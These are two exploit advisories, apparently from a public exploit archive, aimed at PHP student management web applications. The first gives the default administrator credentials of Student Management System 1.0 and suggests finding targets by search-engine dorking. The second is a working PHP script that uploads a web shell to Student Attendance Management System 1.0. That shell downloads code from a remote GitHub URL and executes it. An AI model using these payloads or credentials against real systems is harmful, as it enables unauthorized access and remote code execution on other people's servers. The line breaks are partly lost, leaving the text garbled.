    =============================================================================================================================================| # Title     : Student Management System v1.0 Insecure Settings Vulnerability                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/student-management-system-using-php-and-mysql/                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = Test@123[+] http://127.0.0.1/studentms/admin/dashboard.php Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Student Management System 1.0 Insecure Settings

Student Attendance Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Student Attendance Management System 1.0 code injection Vulnerability                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/student-attendance-management-system.zip              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] Line 28    Line 37  [+] change the path of the script folder.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'name' => 'Hacked By Indoushka',        'email' => 'indoushka4ever@gmail.com',    'contact' => '00213771818860',    'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/student_attendance/ajax.php?action=save_settings");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/student_attendance/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tag

#windows